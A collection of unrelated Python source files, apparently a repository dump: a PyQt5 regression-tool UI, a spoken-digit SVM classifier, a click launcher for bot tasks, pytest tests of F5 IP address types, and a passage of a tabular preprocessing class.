        self.groupBox_14.setGeometry(QtCore.QRect(10, 280, 521, 181))
        self.groupBox_14.setStyleSheet("\n"
"QGroupBox {\n"
"    font-weight: bold;\n"
"    border: 0px solid #DCDCDC;\n"
"    }\n"
"")
        self.groupBox_14.setObjectName("groupBox_14")
        self.tableView_3 = QtWidgets.QTableView(self.groupBox_14)
        self.tableView_3.setGeometry(QtCore.QRect(10, 30, 501, 141))
        self.tableView_3.setStyleSheet("")
        self.tableView_3.setObjectName("tableView_3")
        # Explicit stacking (z-) order for tab 2 widgets
        self.groupBox_13.raise_()
        self.groupBox_12.raise_()
        self.groupBox_14.raise_()
        self.groupBox_11.raise_()
        self.groupBox_10.raise_()
        self.progressBar_2.raise_()
        self.groupBox_4.raise_()
        self.pushButton_3.raise_()
        self.groupBox_5.raise_()
        self.graphicsView_2.raise_()
        self.pushButton_4.raise_()
        self.tabWidget.addTab(self.tab_2, "")
        # --- Top control bar (shared across tabs): file chooser + options ---
        self.groupBox_7 = QtWidgets.QGroupBox(self.centralwidget)
        self.groupBox_7.setGeometry(QtCore.QRect(10, 0, 991, 61))
        self.groupBox_7.setStyleSheet("")
        self.groupBox_7.setObjectName("groupBox_7")
        self.pushButton_1 = QtWidgets.QPushButton(self.groupBox_7)
        self.pushButton_1.setGeometry(QtCore.QRect(10, 30, 75, 23))
        self.pushButton_1.setStyleSheet("/* QPushButton -------------------------------------------------------------- */\n"
"\n"
"QPushButton {\n"
"    background-color: #E1E1E1;\n"
"    border: 1px solid #ADADAD;\n"
"    color: #000000;\n"
"    border-radius: 4px;\n"
"    outline: none;\n"
"}\n"
"\n"
"QPushButton:hover,\n"
"QPushButton:checked:hover{\n"
"    border: 1px solid #0078D7;\n"
"    background-color: #E5F1FB;\n"
"    color: #000000;\n"
"}\n"
"\n"
"QPushButton:pressed {\n"
"    background-color: #CCE4F7;\n"
"    border: 1px solid #00559B;\n"
"    color: #000000;\n"
"}")
        self.pushButton_1.setObjectName("pushButton_1")
        self.lineEdit_1 = QtWidgets.QLineEdit(self.groupBox_7)
        self.lineEdit_1.setGeometry(QtCore.QRect(90, 30, 301, 21))
        self.lineEdit_1.setStyleSheet("QLineEdit {\n"
"    background-color: #FFFFFF;\n"
"    border-style: solid; /* without this border reverts for disabled */\n"
"    border: 1px solid #7A7A7A;\n"
"    color: #000000;\n"
"    border-radius: 4px;\n"
"    outline: none;\n"
"}\n"
"\n"
"QLineEdit:hover{\n"
"    border: 1px solid #000000;\n"
"    background-color: #FFFFFF;\n"
"    color: #000000;\n"
"}\n"
"")
        self.lineEdit_1.setReadOnly(True)
        self.lineEdit_1.setObjectName("lineEdit_1")
        self.checkBox_1 = QtWidgets.QCheckBox(self.groupBox_7)
        self.checkBox_1.setGeometry(QtCore.QRect(580, 30, 91, 17))
        self.checkBox_1.setStyleSheet("border: none\n"
"")
        self.checkBox_1.setObjectName("checkBox_1")
        self.comboBox_1 = QtWidgets.QComboBox(self.groupBox_7)
        self.comboBox_1.setGeometry(QtCore.QRect(420, 28, 131, 22))
        self.comboBox_1.setStyleSheet("")
        self.comboBox_1.setObjectName("comboBox_1")
        self.comboBox_1.addItem("")
        self.comboBox_1.addItem("")
        self.comboBox_1.addItem("")
        MainWindow.setCentralWidget(self.centralwidget)
        # --- Menu bar and status bar ---
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 1011, 21))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        # Install translatable texts, select the first tab, auto-connect slots
        self.retranslateUi(MainWindow)
        self.tabWidget.setCurrentIndex(0)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
        # Keyboard focus (Tab key) chain
        MainWindow.setTabOrder(self.tabWidget, self.pushButton_1)
        MainWindow.setTabOrder(self.pushButton_1, self.lineEdit_1)
        MainWindow.setTabOrder(self.lineEdit_1, self.dateEdit_1)
        MainWindow.setTabOrder(self.dateEdit_1, self.dateEdit_2)
        MainWindow.setTabOrder(self.dateEdit_2, self.radioButton_1)
        MainWindow.setTabOrder(self.radioButton_1, self.radioButton_2)
        MainWindow.setTabOrder(self.radioButton_2, self.radioButton_3)
        MainWindow.setTabOrder(self.radioButton_3, self.pushButton_2)
        MainWindow.setTabOrder(self.pushButton_2, self.lineEdit_2)
        MainWindow.setTabOrder(self.lineEdit_2, self.tableView_1)
        MainWindow.setTabOrder(self.tableView_1, self.radioButton_5)
        MainWindow.setTabOrder(self.radioButton_5, self.radioButton_4)
        MainWindow.setTabOrder(self.radioButton_4, self.lineEdit_5)
        MainWindow.setTabOrder(self.lineEdit_5, self.tableView_2)
        MainWindow.setTabOrder(self.tableView_2, self.lineEdit_3)
        MainWindow.setTabOrder(self.lineEdit_3, self.pushButton_3)
        MainWindow.setTabOrder(self.pushButton_3, self.pushButton_4)
        MainWindow.setTabOrder(self.pushButton_4, self.lineEdit_4)
def retranslateUi(self, MainWindow):
    """Set every user-visible string of the UI.

    Auto-generated by Qt Designer / pyuic5 — do not hand-edit the strings
    here; regenerate from the .ui file instead. Called from setupUi and
    again whenever the application language changes.
    """
    _translate = QtCore.QCoreApplication.translate
    MainWindow.setWindowTitle(_translate("MainWindow", "Methodologies DP&R"))
    self.pushButton_2.setText(_translate("MainWindow", "Calculate"))
    self.groupBox.setTitle(_translate("MainWindow", "Inputs"))
    self.label_1.setText(_translate("MainWindow", "Service Date Range Begin:"))
    self.groupBox_2.setTitle(_translate("MainWindow", "Date of Intervention (DOI) Optimization Options"))
    self.radioButton_1.setText(_translate("MainWindow", "Maximize 1 month prior to DOI"))
    self.radioButton_2.setText(_translate("MainWindow", "Maximize 1 month difference after DOI"))
    self.radioButton_3.setText(_translate("MainWindow", "Maximize 12 month difference after DOI"))
    self.label_2.setText(_translate("MainWindow", "Service Date Range End:"))
    self.groupBox_3.setTitle(_translate("MainWindow", "Outputs"))
    self.label.setText(_translate("MainWindow", "Optimal DOI:"))
    self.label_8.setText(_translate("MainWindow", "Amount:"))
    self.groupBox_8.setTitle(_translate("MainWindow", "Chart"))
    self.groupBox_9.setTitle(_translate("MainWindow", "Table"))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", " Data Points "))
    self.groupBox_4.setTitle(_translate("MainWindow", "Inputs"))
    self.label_3.setText(_translate("MainWindow", "Maximum Number of Segments:"))
    self.label_4.setText(_translate("MainWindow", "Maximum Number of Iterations:"))
    self.groupBox_6.setTitle(_translate("MainWindow", "Explanatory Variable (Time) Recode Options"))
    self.label_6.setText(_translate("MainWindow", "All independent variables vary"))
    self.label_14.setText(_translate("MainWindow", "One independent variable varies while all others held constant"))
    self.label_5.setText(_translate("MainWindow", "Continuous without Discretization"))
    self.label_9.setText(_translate("MainWindow", "Continuous with Discretization"))
    self.pushButton_3.setText(_translate("MainWindow", "Calculate"))
    self.groupBox_5.setTitle(_translate("MainWindow", "Outputs"))
    self.label_7.setText(_translate("MainWindow", "Optimal Number of Segments:"))
    self.label_16.setText(_translate("MainWindow", "Function value:"))
    self.pushButton_4.setText(_translate("MainWindow", "Export"))
    self.groupBox_10.setTitle(_translate("MainWindow", "Chart"))
    self.groupBox_11.setTitle(_translate("MainWindow", "Tables"))
    self.groupBox_12.setTitle(_translate("MainWindow", "Summary"))
    self.groupBox_13.setTitle(_translate("MainWindow", "Parameters"))
    self.groupBox_14.setTitle(_translate("MainWindow", "ANOVA"))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", " Regression "))
    self.groupBox_7.setTitle(_translate("MainWindow", "Data"))
    self.pushButton_1.setText(_translate("MainWindow", "Select File"))
    self.checkBox_1.setText(_translate("MainWindow", "Has Headers"))
    self.comboBox_1.setItemText(0, _translate("MainWindow", "Tab Delimited"))
    self.comboBox_1.setItemText(1, _translate("MainWindow", "Comma Delimited"))
    self.comboBox_1.setItemText(2, _translate("MainWindow", "Pipe Delimited"))
from mplwidget import MplWidget
# Standalone entry point: build the main window and start the Qt event loop.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    # exec_() blocks until the window closes; its status code is forwarded.
    sys.exit(app.exec_())
|
<reponame>Bot-Ro-Bot/Parsing-Audio-Data<gh_stars>0
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.io import wavfile
from scipy import fftpack
from scipy import signal
from scipy.stats import zscore
import os
from sklearn import svm
# import soundfile as sf
#import pyAudioAnalysis
#module to output the sound
from playsound import playsound
#metadata is a python file which contains a dictoinary of all the speakers and their detals
# import metadata
"""
lets assume the users are tagged the following indices:
Speaker 0 : jackson
Speaker 1 : nicolas
Speaker 2 : theo
Speaker 3 : yweweler
"""
# Each recording is roughly one second long.
sample_length = 1  # in seconds
samples = [] ; sample_rate = []
# Name of the folder (relative to the current directory) holding the WAVs.
dataset_folder = "recordings"
current_dir = os.listdir()
main_dir = os.getcwd()
# chdir into the recordings folder; .index() raises ValueError if missing.
os.chdir(current_dir[current_dir.index(dataset_folder)])
sample_dir = os.getcwd()
all_samples = os.listdir()
# all_samples.sort()
# Sanity print of one file name — assumes at least three files are present.
print((all_samples[2]))
def extract_labels(all_samples):
    """Extract digit labels and speaker names from dataset file names.

    File names follow the pattern ``<digit>_<speaker>_<take>.<ext>``
    (e.g. ``0_jackson_12.wav``).

    :param all_samples: list of WAV file names
    :return: (labels, speakers) — numpy arrays; labels are floats to match
             the numeric use downstream
    """
    labels = []
    speakers = []
    print("Extracting Labels")
    for i, file_name in enumerate(all_samples):
        # splitext is robust to any extension length; the old `[0:-3]` slice
        # assumed exactly three trailing characters ("wav").
        stem = os.path.splitext(file_name)[0]
        parts = stem.split("_")
        labels.append(float(parts[0]))
        speakers.append(parts[1])
        if i % 16 == 0:
            print("-", end="")  # lightweight progress bar
    print("\nLabels Extracted\n")
    return np.array(labels), np.array(speakers)
def import_data(all_samples):
    """Read every WAV file listed in *all_samples*.

    :param all_samples: list of WAV file paths
    :return: (samples, sample_rate) — array of signal arrays and a list of
             per-file sampling rates in Hz

    Note: ``wavfile.read`` returns ``(rate, data)``; the old code named the
    rate ``s_len`` as if it were a length, which was misleading.
    """
    samples = []
    sample_rate = []
    print("Loading Dataset")
    for i, path in enumerate(all_samples):
        rate, data = wavfile.read(path)
        samples.append(data)
        sample_rate.append(rate)
        if i % 16 == 0:
            print("-", end="")  # lightweight progress bar
    print("\nDataset Loaded\n")
    # NOTE(review): np.array over ragged (unequal-length) signals fails on
    # NumPy >= 1.24; lengths are equalized later by zero_padding — confirm
    # call order before upgrading NumPy.
    return np.array(samples), sample_rate
def normalize_data(samples):
    """Z-score normalize each signal (zero mean, unit variance)."""
    return list(map(zscore, samples))
def zero_padding(samples, target_len=4096):
    """Pad or crop every sample in-place to exactly *target_len* points.

    Shorter signals are zero-padded symmetrically; longer ones are cropped
    symmetrically. A power-of-two length makes later FFTs fast.

    :param samples: mutable sequence of 1-D numpy arrays (modified in place)
    :param target_len: desired length; defaults to the original 4096 for
                       backward compatibility
    :return: the same sequence, lengths equalized

    Fixes: the old code computed ``diff`` twice — the first expression
    (``int(abs(4096-length) / 2)``) was dead code, immediately overwritten.
    """
    for i, signal_arr in enumerate(samples):
        length = len(signal_arr)
        if length == target_len:
            continue
        diff = abs(target_len - length)
        pad_front = diff // 2
        pad_back = diff - pad_front  # takes the extra point when diff is odd
        if length < target_len:
            samples[i] = np.pad(signal_arr, (pad_front, pad_back))
        else:
            # crop: drop pad_front points from the head, pad_back from the tail
            samples[i] = signal_arr[pad_front:-pad_back]
    return samples
def train_test_split(samples, labels):
    """Split samples/labels 75:25 into train and test partitions.

    Note: the split is positional (no shuffling), so the input order
    determines which items land in the test set.
    """
    split_at = int(0.75 * len(samples))
    return (samples[:split_at], labels[:split_at],
            samples[split_at:], labels[split_at:])
# ---- script body: load, preprocess, train and evaluate an SVM ----
samples,sample_rate = import_data(all_samples)
# print(samples)
labels, speakers = extract_labels(all_samples)
# samples = zero_padding(samples)
samples = zero_padding(samples)
samples = normalize_data(samples)
# print(samples)
# Positional 75:25 split — no shuffling, so file order decides the test set.
train_data , train_label, test_data ,test_label = train_test_split(samples, labels)
# print(train_data.shape, train_label.shape, test_data.shape, test_label.shape)
# print(train_data.flatten())
# NOTE(review): raw time-domain samples are fed straight to the SVM — no
# spectral features are extracted despite the fftpack/signal imports above.
clf = svm.SVC()
clf.fit(train_data,train_label)
# pred = (clf.predict([test_data[10]]))
pred = (clf.predict(test_data))
# print(pred)
# Count exact matches between integer-cast predictions and labels.
points = 0
for i in range(len(pred)):
    print(int(pred[i]),test_label[i])
    if ( int(pred[i]) == int(test_label[i]) ):
        points+=1
print("Accuracy : ", ( (points/ len(pred)) * 100))
# print("Value should be :", test_label[10])
<reponame>zhiiker/donbot
import time
import click
from utils.utils import get_config
NOINPUT = 'noinput'
class MyIntParamType(click.ParamType):
    """Click integer parameter type that lets the NOINPUT sentinel through.

    NOINPUT marks "option not given on the command line" so the value can
    later fall back to the config file (see get_config_value).
    """
    name = 'myinteger'

    def convert(self, value, param, ctx):
        """Return NOINPUT unchanged, otherwise coerce to int or fail."""
        if value == NOINPUT:
            return NOINPUT
        try:
            return int(value)
        except ValueError:
            # UnicodeError was also listed here, but it is a ValueError
            # subclass, so the extra catch was redundant.
            self.fail('%s is not a valid integer' % value, param, ctx)

    def __repr__(self):
        return 'MYINT'
class MyBoolParamType(click.ParamType):
    """Click boolean parameter type accepting common true/false spellings.

    Also lets the NOINPUT sentinel through so the value can fall back to
    the config file (see get_config_value).
    """
    name = 'myboolean'

    def convert(self, value, param, ctx):
        """Map textual booleans to bool, pass bools and NOINPUT through."""
        if isinstance(value, bool):
            return bool(value)
        lowered = value.lower()
        if lowered in ('true', 't', '1', 'yes', 'y'):
            return True
        if lowered in ('false', 'f', '0', 'no', 'n'):
            return False
        if lowered == NOINPUT:
            return NOINPUT
        self.fail('%s is not a valid boolean' % lowered, param, ctx)

    def __repr__(self):
        return 'MYBOOL'
# Singleton parameter-type instances used by the click options below.
MYINT = MyIntParamType()
MYBOOL = MyBoolParamType()
def get_config_value(value, key, config, _default=None, default=NOINPUT):
    """Resolve an option value with fallback to the config file.

    Precedence: an explicitly given CLI value (anything other than the
    *default* sentinel) wins; otherwise ``config['args'][key]`` is used;
    a missing/empty config entry falls back to *_default*.

    Fixes: the old success branch was the no-op ``value = value`` feeding a
    shared ``return`` — replaced with early returns.
    """
    if value != default:
        return value
    arg_value = None
    if config.get('args'):
        arg_value = config['args'].get(key)
    # empty string is treated the same as missing (but 0/False are kept)
    if arg_value is None or arg_value == '':
        return _default
    return arg_value
@click.command()
@click.option('-t', '--task', default=None)
@click.option('-c', '--config', help='config format file, num or file#num')
@click.option('-a', '--auto', type=MYBOOL, default=NOINPUT)
@click.option('-d', '--duration', type=MYINT, default=NOINPUT)
@click.option('-w', '--wait', type=MYINT, default=NOINPUT)
@click.option('-m', '--max_click', type=MYINT, default=NOINPUT)
@click.option('-e', '--skip', default=NOINPUT)
@click.option('-q', '--close', type=MYBOOL, default=NOINPUT)
@click.option('-p', '--cashout', type=MYBOOL, default=NOINPUT)
@click.option('-s', '--solo', type=MYBOOL, default=NOINPUT)
@click.option('-b', '--cron', type=MYBOOL, default=NOINPUT)
def cli(task, config, auto, duration, wait, max_click, skip, close, cashout, solo, cron):
    """Run the selected bot task in an endless retry loop.

    The task name comes from -t/--task or, failing that, from the config
    file. Each option left at the NOINPUT sentinel falls back to
    config['args'] via get_config_value. Task modules are imported lazily
    inside the branch that needs them.
    """
    config = get_config(config=config)
    if task is None:
        task = config.get('task')
    while True:
        try:
            if task == 'empty':
                from apps.empty import EmptyTask
                e = EmptyTask(config=config)
                e.run()
            elif task == 'koinme':
                from apps.koinme import Koinme
                auto = get_config_value(auto, 'auto', config, _default=False)
                k = Koinme(config=config)
                k.koinme(auto=auto)
            elif task == 'ameb':
                from apps.ameb import Ameb
                cron = get_config_value(cron, 'cron', config, _default=False)
                duration = get_config_value(duration, 'duration', config, _default=None)
                wait = get_config_value(wait, 'wait', config, _default=None)
                a = Ameb(config=config)
                a.ameb(cron=cron, duration=duration, wait=wait)
            elif task == 'am_emu':
                from apps.ameb import Ameb
                max_click = get_config_value(max_click, 'max_click', config, _default=None)
                duration = get_config_value(duration, 'duration', config, _default=None)
                skip = get_config_value(skip, 'skip', config, _default=None)
                close = get_config_value(close, 'close', config, _default=False)
                cashout = get_config_value(cashout, 'cashout', config, _default=True)
                a = Ameb(config=config)
                a.am_emu(max_click=max_click, duration=duration, skip=skip, close=close, cashout=cashout)
            elif task == 'eb_emu':
                from apps.ameb import Ameb
                solo = get_config_value(solo, 'solo', config, _default=True)
                close = get_config_value(close, 'close', config, _default=False)
                cron = get_config_value(cron, 'cron', config, _default=False)
                duration = get_config_value(duration, 'duration', config, _default=None)
                a = Ameb(config=config)
                a.eb_emu(solo=solo, close=close, cron=cron, duration=duration)
            elif task == 'ameb_emu':
                from apps.ameb import Ameb
                max_click = get_config_value(max_click, 'max_click', config, _default=None)
                duration = get_config_value(duration, 'duration', config, _default=None)
                skip = get_config_value(skip, 'skip', config, _default=None)
                close = get_config_value(close, 'close', config, _default=False)
                cashout = get_config_value(cashout, 'cashout', config, _default=False)
                a = Ameb(config=config)
                a.ameb_emu(max_click=max_click, duration=duration, skip=skip, close=close, cashout=cashout)
            elif task == 'bing':
                from apps.bing import BingTask
                close = get_config_value(close, 'close', config, _default=True)
                a = BingTask(config)
                a.run(close=close)
        except KeyboardInterrupt:
            break
        except Exception as e:
            # NOTE(review): all task errors are silently swallowed and the
            # task retried after 10 minutes — consider logging `e` so
            # failures are visible.
            # print(e)
            # raise
            time.sleep(60 * 10)


if __name__ == '__main__':
    cli()
|
<reponame>simonkowallik/as3ninja<filename>tests/test_types.py
# -*- coding: utf-8 -*-
import pytest
from as3ninja.types import F5IP, F5IPv4, F5IPv6
class Test_type_F5IPx:
    """Tests for the F5IP / F5IPv4 / F5IPv6 address types.

    Addresses use the F5 notation ``<ip>%<route-domain-id>/<mask>`` where
    both the route-domain id and the mask are optional.
    """

    # Each entry: [IP version, address literal, expected to validate?]
    test_params = [
        # IP version, IP Address, Valid(True/False)
        ["ipv4", "192.168.0.1%123/32", True],
        ["ipv4", "192.168.0.1%123", True],
        ["ipv4", "192.168.0.1/32", True],
        ["ipv4", "0.0.0.0/0", True],
        ["ipv4", "0.0.0.0%123/0", True],
        ["ipv4", "9172.16.31.10%123/24", False],  # invalid address (octet > 255)
        ["ipv4", "1.2.3.4%-1/32", False],  # wrong rdid
        ["ipv4", "1.2.3.4%65536/32", False],  # wrong rdid
        ["ipv4", "256.0.0.1", False],  # wrong IPv4
        ["ipv4", "1.2.3.4/33", False],  # wrong mask
        ["ipv4", "127.0.0.1", False],  # loopback not allowed
        ["ipv4", "127.100.0.1", False],  # loopback not allowed
        [
            "ipv4",
            "169.254.0.1",
            True,
        ],  # link-local ok -> https://support.f5.com/csp/article/K13098
        ["ipv6", "2001:db9::%1/120", True],
        ["ipv6", "fc00:db20:35b:7399::5%1/128", True],
        ["ipv6", "fc00:db20:35b:7399::5%1", True],
        ["ipv6", "::%65534/0", True],
        ["ipv6", "2001:db8::", True],
        ["ipv6", "2001:DB8::", True],  # uppercase IPv6
        ["ipv6", "::", True],
        ["ipv6", "a::g", False],  # wrong IPv6
        ["ipv6", "200::cafe::1", False],  # wrong IPv6
        ["ipv6", "fc00:db20:35b:7399::5/129", False],  # wrong mask
        ["ipv6", "fc00:db20:35b:7399::5%ABC/cde", False],  # wrong rdid + mask
        ["ipv6", "::1", False],  # loopback not allowed
    ]

    def test_input_type(self):
        """Non-string input must raise TypeError."""
        with pytest.raises(TypeError):
            F5IP(int(123))

    def test_schema_is_dict(self):
        """All three types expose a dict JSON schema."""
        assert isinstance(F5IP.schema(), dict)
        assert isinstance(F5IPv4.schema(), dict)
        assert isinstance(F5IPv6.schema(), dict)

    def test_schema_examples_IPAny(self):
        """Every schema example for F5IP must itself validate."""
        for example_ip in F5IP.schema()["properties"]["f5ip"]["examples"]:
            assert isinstance(F5IP(example_ip), F5IP)

    def test_schema_examples_IPv4(self):
        """Every schema example for F5IPv4 must itself validate."""
        for example_ip in F5IPv4.schema()["properties"]["f5ip"]["examples"]:
            assert isinstance(F5IPv4(example_ip), F5IPv4)

    def test_schema_examples_IPv6(self):
        """Every schema example for F5IPv6 must itself validate."""
        for example_ip in F5IPv6.schema()["properties"]["f5ip"]["examples"]:
            assert isinstance(F5IPv6(example_ip), F5IPv6)

    def test_dunder_str(self):
        """str() shows the class name and the address literal."""
        model = F5IP("0.0.0.0")
        assert model.__str__() == "F5IP('0.0.0.0')"

    def test_dunder_repr(self):
        """repr() matches str()."""
        model = F5IP("0.0.0.0")
        assert model.__repr__() == "F5IP('0.0.0.0')"

    @pytest.mark.parametrize("ipv, test_ip, expected_result", test_params)
    def test_ipAny(self, ipv, test_ip, expected_result):
        """F5IP accepts both versions; invalid inputs raise ValueError."""
        try:
            model = F5IP(test_ip)
            assert model.addr in repr(model)
            assert model.mask in repr(model)
            assert model.rdid in repr(model)
        except ValueError:
            assert expected_result is False

    @pytest.mark.parametrize("ipv, test_ip, expected_result", test_params)
    def test_ipv4(self, ipv, test_ip, expected_result):
        """F5IPv4 accepts only IPv4; IPv6 input must raise ValueError."""
        if ipv == "ipv4":
            try:
                model = F5IPv4(test_ip)
                assert model.addr in repr(model)
                assert model.mask in repr(model)
                assert model.rdid in repr(model)
            except ValueError:
                assert expected_result is False
        else:
            with pytest.raises(ValueError):
                F5IPv4(test_ip)

    @pytest.mark.parametrize("ipv, test_ip, expected_result", test_params)
    def test_ipv6(self, ipv, test_ip, expected_result):
        """F5IPv6 accepts only IPv6; IPv4 input must raise ValueError."""
        if ipv == "ipv6":
            try:
                model = F5IPv6(test_ip)
                assert model.addr in repr(model)
                assert model.mask in repr(model)
                assert model.rdid in repr(model)
            except ValueError:
                assert expected_result is False
        else:
            with pytest.raises(ValueError):
                F5IPv6(test_ip)
|
import importlib
from logging import getLogger
from IPython.display import display
from boruta import BorutaPy
from category_encoders import (
CountEncoder,
OneHotEncoder,
OrdinalEncoder,
TargetEncoder
)
import numpy as np
import pandas as pd
import scipy.sparse as sp
from scipy.stats import ks_2samp
from sklearn.ensemble import IsolationForest
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_selection import RFE
from sklearn.metrics import roc_auc_score
from tqdm import tqdm
from xgboost import XGBClassifier
logger = getLogger('predict').getChild('TableDataTranslater')
if 'BaseDataTranslater' not in globals():
from .BaseDataTranslater import BaseDataTranslater
if 'SingleTrainer' not in globals():
from ..trainers.SingleTrainer import SingleTrainer
if 'Trainer' not in globals():
from ..trainers.Trainer import Trainer
class TableDataTranslater(BaseDataTranslater):
    """Tabular-data preprocessing pipeline.

    Turns raw train/test DataFrames into model-ready ndarrays: adhoc user
    translations, column deletion, leakage-safe category encoding, feature
    selection, distribution / adversarial / anomaly based row filtering,
    and final keras/sparse formatting. Orchestrated by calc_train_data().
    """

    def __init__(self, kernel=False):
        # kernel=True means "running inside a Kaggle kernel": adhoc myfunc
        # helpers are assumed to be defined inline rather than imported.
        self.kernel = kernel
        self.configs = {}

    def _translate_adhoc_df(self):
        """Apply user-defined DataFrame-level translation methods."""
        trans_adhoc_df = self.configs['pre']['table'].get('adhoc_df')
        if not trans_adhoc_df:
            return
        if not self.kernel:
            # bound so the eval()'d 'myfunc.<name>' below can resolve it
            myfunc = importlib.import_module(
                'modules.myfuncs.%s' % trans_adhoc_df['myfunc'])
        # temporarily merge target onto train so adhoc funcs can see it
        train_pred_df = pd.merge(
            self.train_df, self.pred_df, left_index=True, right_index=True)
        for method_name in trans_adhoc_df['methods']:
            logger.info('adhoc_df: %s' % method_name)
            if not self.kernel:
                method_name = 'myfunc.%s' % method_name
            train_pred_df, self.test_df = eval(
                method_name)(train_pred_df, self.test_df)
        # drop the temporarily merged target columns again
        self.train_df = train_pred_df.drop(self.pred_cols, axis=1)
        del train_pred_df
        return

    def _delete_columns(self):
        """Drop configured columns from both train and test DataFrames."""
        trans_del = self.configs['pre']['table'].get('deletion')
        if not trans_del:
            return
        logger.info('delete: %s' % trans_del)
        self.train_df.drop(trans_del, axis=1, inplace=True)
        self.test_df.drop(trans_del, axis=1, inplace=True)
        return

    def _encode_category_with_cv(self, model_obj, columns):
        """Encode categories out-of-fold to avoid target leakage.

        Train rows are encoded by a model fit on the other folds; test rows
        by a model fit on all train data. Returns (train_encoded,
        test_encoded) DataFrames aligned to the original indexes.
        """
        # use the training cv settings
        cv, _ = Trainer.get_cvs_from_json(self.configs['fit'].get('cv'))
        logger.info(f'cv: {cv}')
        indexes = cv.split(self.train_df, self.pred_df)
        # train: out-of-fold transform
        train_encoded = []
        for train_index, val_index in indexes:
            model_obj.fit(
                self.train_df.loc[train_index][columns],
                self.pred_df.loc[train_index])
            _train_encoded = model_obj.transform(
                self.train_df.loc[val_index][columns])
            train_encoded.append(_train_encoded)
        train_encoded = pd.concat(train_encoded)
        # fill NaN produced by onehot/label encoders on unseen categories
        train_encoded = train_encoded.fillna(-1)
        train_encoded.sort_index(inplace=True)
        # test: fit on all train data
        # TODO: consider supporting a pipeline for the fit step only
        model_obj.fit(self.train_df[columns], self.pred_df)
        test_encoded = model_obj.transform(self.test_df[columns])
        # kept for reuse by pre_processers
        self.encoding_model = model_obj
        return train_encoded, test_encoded

    def _encode_category_single(self, model, columns):
        """Build the encoder for *model* and run the CV-safe encoding."""
        if model == 'count':
            model_obj = CountEncoder(cols=columns)
        elif model == 'onehot':
            model_obj = OneHotEncoder(cols=columns, use_cat_names=True)
        elif model == 'label':
            model_obj = OrdinalEncoder(cols=columns)
        elif model == 'target':
            model_obj = TargetEncoder(cols=columns)
        else:
            logger.error('NOT IMPLEMENTED CATEGORY ENCODING: %s' % model)
            raise Exception('NOT IMPLEMENTED')
        # avoid data leakage
        train_encoded, test_encoded = \
            self._encode_category_with_cv(model_obj, columns)
        # rename encoded columns to '<column>_<model>'
        rename_mapping = {}
        for column in columns:
            rename_mapping[column] = f'{column}_{model}'
        train_encoded.rename(columns=rename_mapping, inplace=True)
        test_encoded.rename(columns=rename_mapping, inplace=True)
        return train_encoded, test_encoded

    def _encode_category(self):
        """Encode object-dtype columns per the configured encoder options."""
        trans_category = self.configs['pre']['table'].get('category_encoding')
        if not trans_category:
            return
        # columns explicitly claimed by per-option configs
        option_columns = []
        for option in trans_category['options']:
            option_columns.extend(option['columns'])
        option_columns = list(set(option_columns))
        # default columns: remaining object-dtype columns (id excluded)
        default_columns = []
        for column, dtype in self.test_df.dtypes.items():
            if column in [self.id_col]:
                continue
            if dtype != 'object':
                continue
            if column in option_columns:
                continue
            default_columns.append(column)
        # encode each group, merge the result in, drop the raw columns
        trans_category['default']['columns'] = default_columns
        for config in trans_category['options'] + [trans_category['default']]:
            logger.info('encoding model: %s' % config['model'])
            logger.info('encode category: %s' % config['columns'])
            train_encoded, test_encoded = \
                self._encode_category_single(
                    config['model'], config['columns'])
            # merge
            self.train_df = pd.merge(
                self.train_df, train_encoded,
                left_index=True, right_index=True)
            self.test_df = pd.merge(
                self.test_df, test_encoded,
                left_index=True, right_index=True)
            # drop
            self.train_df.drop(config['columns'], axis=1, inplace=True)
            self.test_df.drop(config['columns'], axis=1, inplace=True)
        return

    def _calc_base_train_data(self):
        """Convert DataFrames to ndarrays and record the feature names."""
        self.Y_train = self.pred_df.to_numpy()
        self.train_ids = self.train_df[self.id_col].to_numpy()
        self.X_train = self.train_df.drop(
            self.id_col, axis=1).to_numpy()
        self.test_ids = self.test_df[self.id_col].to_numpy()
        self.X_test = self.test_df.drop(
            self.id_col, axis=1).to_numpy()
        self.feature_columns = []
        for key in self.train_df.keys():
            if key == self.id_col:
                continue
            self.feature_columns.append(key)
        return

    def _translate_adhoc_ndarray(self):
        """Apply user-defined ndarray-level translation methods."""
        trans_adhoc_ndarray = \
            self.configs['pre']['table'].get('adhoc_ndarray')
        if not trans_adhoc_ndarray:
            return
        if not self.kernel:
            # bound so the eval()'d 'myfunc.<name>' below can resolve it
            myfunc = importlib.import_module(
                'modules.myfuncs.%s' % trans_adhoc_ndarray['myfunc'])
        for method_name in trans_adhoc_ndarray['methods']:
            logger.info('adhoc_ndarray: %s' % method_name)
            if not self.kernel:
                method_name = 'myfunc.%s' % method_name
            self.X_train, self.X_test, self.feature_columns = eval(
                method_name)(self.X_train, self.X_test, self.feature_columns)
        return

    def _to_float32(self):
        """Downcast X (and Y for regression) to float32 to save memory."""
        if self.X_train.dtype != 'object':
            self.X_train = self.X_train.astype(np.float32)
            self.X_test = self.X_test.astype(np.float32)
        if self.configs['pre']['train_mode'] == 'reg':
            self.Y_train = self.Y_train.astype(np.float32)
        return

    def _select_feature(self):
        """Reduce features with boruta or RFE, per configuration."""
        selection = self.configs['pre']['table'].get('feature_selection')
        if not selection:
            return
        n = selection['n']
        model = selection['model']
        if model == 'boruta':
            selector = BorutaPy(
                estimator=RandomForestClassifier(
                    class_weight='balanced', max_depth=5, n_jobs=-1),
                n_estimators=n, verbose=2, random_state=42)
        elif model == 'rfe':
            selector = RFE(
                estimator=XGBClassifier(random_state=42, n_jobs=-1),
                n_features_to_select=n)
        else:
            logger.error(
                'NOT IMPLEMENTED FEATURE SELECTION: %s' % model)
            raise Exception('NOT IMPLEMENTED')
        selector.fit(self.X_train, self.ravel_like(self.Y_train))
        features = selector.support_
        logger.info(
